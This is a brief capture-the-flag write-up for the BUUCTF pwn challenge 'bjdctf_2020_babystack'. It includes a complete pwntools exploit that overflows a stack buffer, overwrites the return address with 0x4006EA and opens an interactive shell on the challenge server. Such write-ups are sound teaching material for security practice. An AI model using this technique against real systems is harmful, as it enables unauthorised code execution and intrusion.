[BUUCTF-pwn]——bjdctf_2020_babystack
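Run checksec on the binary in Linux. It is a 64-bit binary, so we need to be careful with functions that take fewer than six arguments (on x86-64 the first six arguments are passed in registers).
Take a look in IDA.
Once you see this, I don't need to say much more, right? So easy!!!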
exploit
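from pwn import *
# Connect to the remote challenge instance
p = remote("node3.buuoj.cn", 25355)
# Address that overwrites the saved return address
sys = 0x04006EA
# Declare a name length of 200
p.sendlineafter(b"[+]Please input the length of your name:\n", b'200')
# 0x10 + 0x8 bytes of padding reach the saved return address (bytes, so it concatenates with p64 on Python 3)
payload = b'a' * (0x10 + 0x8) + p64(sys)
p.sendlineafter(b"[+]What's u name?\n", payload)
p.interactive()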